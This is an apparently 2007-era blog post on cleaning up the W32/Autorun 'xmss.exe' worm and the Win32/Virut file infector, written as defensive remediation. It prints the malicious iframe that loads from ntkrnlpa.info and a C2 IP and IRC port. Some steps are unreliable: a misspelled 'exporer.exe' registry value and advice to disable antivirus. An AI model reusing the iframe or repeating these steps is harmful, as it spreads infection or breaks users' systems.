Yesterday I got a new type of “Stupid Worm” hidding in background as xmss.exe. It copied itself on Local disk and Windows Directory (%Windir%). Terminated “Windows Task Manager”, Windows Command Prompt (DOS-Prompt) & crashed System Internal Process Explorer (procxp.exe).

Its not a funny video

According to McAfee, this worm is known as W32/Autorun.worm.g.

It can propagate itself over removable media and network drives and cause execution of malicious code via an autorun.inf file.

XMSS.exe Win32 AutoRun Files

• x:autorun.inf
• x:xmss.exe
• x:Funny UST Scandal.avi.exe
• %Windir%\autorun.inf
• %Windir%\xmss.exe
• %Windir%\Funny UST Scandal.avi.exe

Fixes Win32 AutoRun.* Worm

Here’s a few step to prevent Win32 AutoRun Worm.

1. Disabled System Restore for Temporary - KB 264887
2. Boot Windows in Safe Mode - KB 315222

3. In Windows Safe Mode, Open Windows Registry Editor

   Windows Start > Run > Regedit

4. Browse to the following registry settings ↓

   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

5. Replace
   explorer.exe, xmss.exe with exporer.exe
   
6. Delete all the following files
   • C\autorun.inf
   • C\xmss.exe
   • C\Funny UST Scandal.avi.exe
   • X:\autorun.inf
   • X:\xmss.exe
   • X:\Funny UST Scandal.avi.exe
   • %Windir%\autorun.inf
   • %Windir%\xmss.exe
   • %Windir%\Funny UST Scandal.avi.exe

   %Windir% refers to the Windows folder (e.g. C:\Windows, C:\WindowsNT) and X: is drive letters used by a removable or network drive

7. Clean All Windows Temporary Files
8. Restart Windows

XMSS.exe Win32 Autorun Variants

VirusTotal.com - Dec 2007 Results.

External Links

• How to Enable and Disable System Restore
• Safe Mode Boot options in Windows

I found this frustrating that most Anti-virus product will deleted or quarantine your infected files. I lost many projects because of this worms.

Don’t used “auto-clean/fix” online scanner if you favors your projects. Belows is step by steps fixes for win32/Virut. If you dont like manual editing you’ll need a search and replace tools for removing the embed code inside the infected files.

1. Make sure all of the infected (*.exe win32/virtob) files has been quarantine.
2. Optionally block outbound access to 78.109.19.139:80 & irc port 65520 in your firewall settings.
3. Disabled AntiVirus if any.
4. Shutdown your PC and start windows on SafeMode (Press F8 or F5 after BIOS screen).
5. Search all files with *.htm, *.html, *.php, *.asp extensions.
   delete or replace the following text (strings)

   <iframe src="http://ntkrnlpa.info/cr/?i=1" height="1" width="1"></iframe>

Search and Replace Tools

• For windows - there is lots of similar tools and I’m not sure which one to recommend as it seem most did the same thing so Google for “search-and-replace” pick your best.
• For Cygwin or *nix bash console - Used sed commands to search & replace strings in all infected files.
• Python in windows - You can try this solutions.

Win32/Virut Virustotal.com Results

Notes on Microsoft Windows Malicious Software Removal Tool

Update On: Nov,20 2007 by NoahArk
I have Win.32/virut files in my archive (for backup purpose). Last week I installed Microsoft Windows Malicious Software Removal tool v1.35 (Nov 13, 2007, KB890830).

Microsoft’s claimed this tool can fixes w32/Virut . But the results is much worsed than I expected. It doesn’t detect Win32/Virut on my windows XP SP2 instead halfway before the scan complete its trigger the worm and starts spreading as Win32/virtob & Virut[A-W] (infecting *.exe & *.html). I’d removed all Microsoft Removal tools (MS Malicious Software Removal tool, MS Defender,MS Baseline Security Analyzer). Microsoft Developer should have know better on how to prevent most of these type infections.Its their own design flaw and products.

I still keep the infected Win32/Virut files, if anyone need it please send an email to . My request to Microsoft Team, they should clean this crapy worms so all those unfortunate client’s (including me) wont have to hunt down on pricey antivirus solutions.

W32/Virut and ntkrnlpa.info

The worms started spreading since September 2006. After one year anniversay It still in the wild like it will never stop.

I’d send a letter to ntkrnlpa.info ISP (hosting.ua), and they have closed down the sites for good. And also google is blocking the site too it will give you a warning notice if search for the particular url.

This worm spread via simple html tags and increased the filesize around 8kb. Because of this simple method and low damage most Anti-Virus and security vendor label it as medium and low. The thread label is debatable.

Based on wikipedia “Usage share of Web Browser Statistics”, 81% of Internet users is using Microsoft Internet Explorer (50% of this weblog visitors is on IE too ), IE browser doesn’t blocked IFRAME that can be a problem.

Imagine if some webmaster uploaded an infected files on heavy traffic websites like myspace and facebook. The results could be disaster. Nobody want to see its happening.

Related Entries

• Tips on How to safeguard your Windows when cleaning files infected by win32 virus.
• How to Block Acces to Unsavory Websites Without using Firewall or third party software

Just after my previous cleanup, now i got much worse virus on my PC its called Worm.Win32.Mefir [a-z] by both Norton Antivirus (Symantec) & Avast (Alwil Software) NOD32 identified it as Win32/Virut.NAT

At the time being It infected *.html & *.php files and probably all text/html types. There is no cure yet. I hated this worms I’d lost few project because of this. Try archive (LZMA) all your web projects before hand. Its spreading like wild fire.

I havent try cleaning the infected files with Trend HouseCall Online Scans. Just hope there is cure for this worm. damn damn